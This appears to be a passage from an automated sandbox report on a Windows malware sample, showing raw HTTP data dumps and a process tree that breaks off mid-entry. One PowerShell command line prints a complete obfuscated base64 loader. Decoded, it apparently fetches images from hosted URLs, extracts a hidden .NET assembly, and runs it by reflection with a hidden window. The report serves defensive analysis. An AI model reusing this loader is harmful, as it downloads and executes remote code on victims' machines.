                                                                                                                                                                                        2024-10-10 11:39:58 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41
                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAA
                                                                                                                                                                                        2024-10-10 11:39:58 UTC486INData Raw: 78 37 6a 34 65 72 54 67 44 59 74 50 52 37 44 76 65 72 54 67 44 55 56 50 70 33 44 35 39 4d 63 50 33 32 54 73 39 6f 61 50 6c 32 7a 67 39 77 52 50 45 77 44 37 38 51 4e 50 38 79 6a 67 38 4d 46 50 35 77 6a 48 38 51 77 4f 70 76 44 79 37 38 30 4f 78 73 44 4b 36 6b 76 4f 43 71 6a 62 35 41 58 4f 6c 6c 6a 53 35 77 53 4f 68 6b 6a 42 34 67 4f 4f 64 6a 6a 77 34 55 4a 4f 4b 69 44 58 34 30 44 4f 79 67 7a 46 33 34 65 72 54 67 44 4e 6a 66 7a 75 33 55 33 4e 71 64 54 55 33 34 68 4e 6f 62 6a 34 32 41 72 4e 69 61 54 6d 32 6f 6e 4e 46 5a 7a 4c 32 51 69 4e 48 55 7a 7a 31 51 63 4e 6d 57 6a 63 31 63 57 4e 54 56 7a 4c 31 67 42 4e 78 54 6a 32 30 59 4a 4e 50 53 7a 62 30 49 47 4e 55 52 54 47 7a 73 2f 4d 4e 50 7a 77 7a 4d 36 4d 4b 4e 54 46 79 41 74 4d 32 4b 6a 72 79 67 71 4d 62 4b 6a
                                                                                                                                                                                        Data Ascii: x7j4erTgDYtPR7DverTgDUVPp3D59McP32Ts9oaPl2zg9wRPEwD78QNP8yjg8MFP5wjH8QwOpvDy780OxsDK6kvOCqjb5AXOlljS5wSOhkjB4gOOdjjw4UJOKiDX40DOygzF34erTgDNjfzu3U3NqdTU34hNobj42ArNiaTm2onNFZzL2QiNHUzz1QcNmWjc1cWNTVzL1gBNxTj20YJNPSzb0IGNURTGzs/MNPzwzM6MKNTFyAtM2KjrygqMbKj
                                                                                                                                                                                        2024-10-10 11:39:58 UTC16384INData Raw: 44 47 7a 63 65 72 54 67 44 4d 68 50 6a 7a 7a 38 37 4d 39 4e 7a 53 7a 59 79 4d 42 49 44 72 79 30 70 4d 58 4a 54 52 79 34 52 4d 78 48 44 36 78 41 65 4d 41 48 54 71 78 77 5a 4d 53 47 7a 67 78 38 57 4d 4f 46 54 53 78 4d 55 4d 72 45 44 4a 77 51 4b 4d 74 42 44 57 41 41 41 41 63 44 51 41 67 41 41 41 41 38 7a 5a 65 72 54 67 44 4d 71 50 63 36 54 6c 65 72 54 67 44 34 6f 50 45 36 44 56 65 72 54 67 44 30 6b 50 47 30 6a 34 39 51 58 50 6f 30 54 48 39 34 51 50 44 77 44 38 38 34 4d 50 33 79 54 6c 37 6b 63 4f 38 6c 44 59 33 38 39 4e 59 64 44 54 33 6f 79 4e 58 63 6a 44 33 59 77 4e 41 59 7a 38 32 34 75 4e 69 62 54 33 32 45 74 4e 4d 62 44 77 32 73 72 4e 76 61 7a 56 32 6f 69 4e 5a 59 6a 45 31 77 65 4e 67 58 6a 31 31 6f 63 4e 45 58 6a 64 31 45 56 4e 62 51 7a 39 30 73 4e 4e 37
                                                                                                                                                                                        Data Ascii: DGzcerTgDMhPjzz87M9NzSzYyMBIDry0pMXJTRy4RMxHD6xAeMAHTqxwZMSGzgx8WMOFTSxMUMrEDJwQKMtBDWAAAAcDQAgAAAA8zZerTgDMqPc6TlerTgD4oPE6DVerTgD0kPG0j49QXPo0TH94QPDwD884MP3yTl7kcO8lDY389NYdDT3oyNXcjD3YwNAYz824uNibT32EtNMbDw2srNvazV2oiNZYjE1weNgXj11ocNEXjd1EVNbQz90sNN7
                                                                                                                                                                                        2024-10-10 11:39:58 UTC1024INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 4a 41 55 37 2f 4d 44 77 70 2f 2f 50 41 6d 65 72 54 67 44 2f 2f 41 55 36 2f 2f 44 51 70 2f 2f 50 41 6c 65 72 54 67 44 2f 2f 41 55 36 2f 2f 44 51 70 2f 2f 50 41 6c 65 72 54 67 44 2f 2f 41 55 36 2f 2f 44 51 70 2f 2f 50 41 6c 65 72 54 67 44 2f 2f 41 55 36 2f 2f 44 41 70 2f 2f 50 41 6b 65 72 54 67 44 2f 2f 41 51 36 2f 2f 44 41 70 2f 2f 50 41 6b 65 72 54 67 44 2f 2f 41 51 36 2f 2f 44 41 70 2f 2f 50 41 6b 65 72 54 67 44 2f 2f 41 51 36 2f 2f 44 41 70 2f 2f 50 41 6b 65 72 54 67 44 2f 2f 41 51 36 2f 2f 44 41 70 2f 2f 50 41 6b 65 72 54 67 44 2f 2f 41 51 36 2f 2f 44 41 70 2f 2f 50 41 6b 65 72 54 67 44 2f 2f 41 51 36 2f 2f 44 41 70 2f 2f 50 41 6b 65 72 54 67 44 2f 2f 41 51 36 2f 2f 44 41 70 2f 2f 50 41 6a 65 72 54 67
                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAgJAU7/MDwp//PAmerTgD//AU6//DQp//PAlerTgD//AU6//DQp//PAlerTgD//AU6//DQp//PAlerTgD//AU6//DAp//PAkerTgD//AQ6//DAp//PAkerTgD//AQ6//DAp//PAkerTgD//AQ6//DAp//PAkerTgD//AQ6//DAp//PAkerTgD//AQ6//DAp//PAkerTgD//AQ6//DAp//PAkerTgD//AQ6//DAp//PAjerTg
                                                                                                                                                                                        2024-10-10 11:39:58 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6a 48 65 59 65 72 54 67 44 66 6b 52 61 38 2f 70 6d 4b 33 2f 4c 73 77 31 2f 50 33 63 2f 2f 2f 34 6a 2f 2f 2f 76 39 32 73 76 38 6b 54 61 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/jHeYerTgDfkRa8/pmK3/Lsw1/P3c///4j///v92sv8kTaMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                        2024-10-10 11:39:58 UTC1024INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                        2024-10-10 11:39:58 UTC1795INData Raw: 32 62 6a 5a 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 55 44 41 41 41 41 45 51 6b 52 33 63 41 56 47 64 6c 78 57 5a 6b 39 31 64 6c 35 32 58 30 4a 33 51 66 56 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 55 44 41 41 41 42 45 5a 30 4e 48 51 6c 78 57 59 6a 39 47 62 41 52 58 5a 6a 46 6d 5a 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 31 41 41 41 41 41 41 45 51 6b 52 33 63 41 56 47 62 68 4e 32 62 73 42 45 63 74 6c 32 59 76 78 30 58 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 31 41 41 41 41 41 42 45 5a 30 4e 48 51 6c 4e 58 59 69 39 46 64 6c 4e 57 59 47 39 6c 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4e 41 41 41 45 51 6b 52 33 63 41 56 32 5a 75 46 6d 63 66 5a 32 62 66 52 58 64 76 5a 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 55 44 41 41 41 42 45 5a 30 4e 48 51 79
                                                                                                                                                                                        Data Ascii: 2bjZVQ/4CAAAAAAUklUDAAAAEQkR3cAVGdlxWZk91dl52X0J3QfVVQ/4CAAAAAAUklUDAAABEZ0NHQlxWYj9GbARXZjFmZWF0PuAAAAAAAFZJ1AAAAAAEQkR3cAVGbhN2bsBEctl2Yvx0XWF0PuAAAAAAAFZJ1AAAAABEZ0NHQlNXYi9FdlNWYG9lVB9jLAAAAAAQRWSNAAAEQkR3cAV2ZuFmcfZ2bfRXdvZVQ/4CAAAAAAUklUDAAABEZ0NHQy
                                                                                                                                                                                        2024-10-10 11:39:58 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 41 41 41 41 41 41 41 41 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 2f 42 36 58 4d 41 41 51 65 72 54 67 44 67 37 4e 32
                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgACIgACIgACIgACIgACIgACIgACIgACIgACAAAAAAAAEQABEQABEQABEQABEQABEQABEQABEQABEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg/B6XMAAQerTgDg7N2
                                                                                                                                                                                        2024-10-10 11:39:58 UTC1024INData Raw: 41 41 41 41 38 2f 2f 2f 2f 50 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 46 4f 4c 41 41 41 41 42 41 67 52 68 7a 42 41 41 41 67 41 5a 4d 5a 42 69 41 41 51 5a 69 7a 2f 2f 7a 50 38 41 63 30 47 38 44 41 41 41 41 41 41 47 42 4f 36 41 41 41 41 42 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 2f 2f 2f 2f 2f 41 41 41 41 41 38 2f 2f 2f 2f 50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 45 34 55 44 41 41 41 45 41 41 47 42 4f 78 41 41 41 41 43 6b 78 6b 46 49 43 41 41 5a 4a 52 2f 2f 50 2f 34 44 77 52 62 77 50 41 41 41 41 41 41 59 45 34 51 43 41 41 41 45 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 77 2f 2f 2f 2f 2f
                                                                                                                                                                                        Data Ascii: AAAA8////PAAAAA/////DAAAAAAAAAAAAAAAAAAAAAAGFOLAAAABAgRhzBAAAgAZMZBiAAQZiz//zP8Ac0G8DAAAAAAGBO6AAAABAAAAEAAAAAAAAAAAAAAAAw/////AAAAA8////PAAAAAAAAAAAAAAAAAAAAAAYE4UDAAAEAAGBOxAAAACkxkFICAAZJR//P/4DwRbwPAAAAAAYE4QCAAAEAAAAQAAAAAAAAAAAAAAAAA/////DAAAAw/////
                                                                                                                                                                                        2024-10-10 11:39:58 UTC16384INData Raw: 4d 5a 42 69 41 41 51 65 41 50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 35 4e 47 41 41 41 41 42 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 2f 2f 2f 2f 2f 41 41 41 41 41 38 2f 2f 2f 2f 50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 6b 33 45 41 41 41 41 45 41 41 47 31 4e 39 41 41 41 41 43 6b 78 6b 46 49 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 4d 77 51 79 59 79 4e 6e 63 75 41 41 41 45 42 49 41 48 45 4a 4d 41 41 41 41 41 45 44 4d 6b 4d 6d 63 7a 4a 6e 4c 41 41 51 41 77 41 77 42 51 43 41 41 41 41 41 41 35 52 79 63 6b 6c 6d 5a 6e 35 43 41 41 45 41 63 41 63 41 67 41 44 41 41 41 41 41 65 6b 4d 48 5a 70 5a 32 5a 75 41 41 41 41 41 4d 41 48 41 49 41
                                                                                                                                                                                        Data Ascii: MZBiAAQeAPAAAAAAAAAAAAAAAAAG5NGAAAABAAAAEAAAAAAAAAAAAAAAAw/////AAAAA8////PAAAAAAAAAAAAAAAAAAAAAAYk3EAAAAEAAG1N9AAAACkxkFICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgMwQyYyNncuAAAEBIAHEJMAAAAAEDMkMmczJnLAAQAwAwBQCAAAAAA5RycklmZn5CAAEAcAcAgADAAAAAekMHZpZ2ZuAAAAAMAHAIA


                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:07:39:30
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Users\user\Desktop\6706e721f2c06.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\6706e721f2c06.exe"
                                                                                                                                                                                        Imagebase:0x7ff7d2a60000
                                                                                                                                                                                        File size:164'352 bytes
                                                                                                                                                                                        MD5 hash:9D26CEE91CD86B11808A161681BE9F85
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                        Start time:07:39:30
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:cmd.exe /c 6706e721f2c06.vbs
                                                                                                                                                                                        Imagebase:0x7ff684a30000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:07:39:30
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:07:39:31
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs"
                                                                                                                                                                                        Imagebase:0x7ff6e26d0000
                                                                                                                                                                                        File size:170'496 bytes
                                                                                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:07:39:31
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBj#HI#aQBq#EY#awBG#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                                                                                                        Imagebase:0x7ff760310000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:07:39:31
                                                                                                                                                                                        Start date:10/10/2024
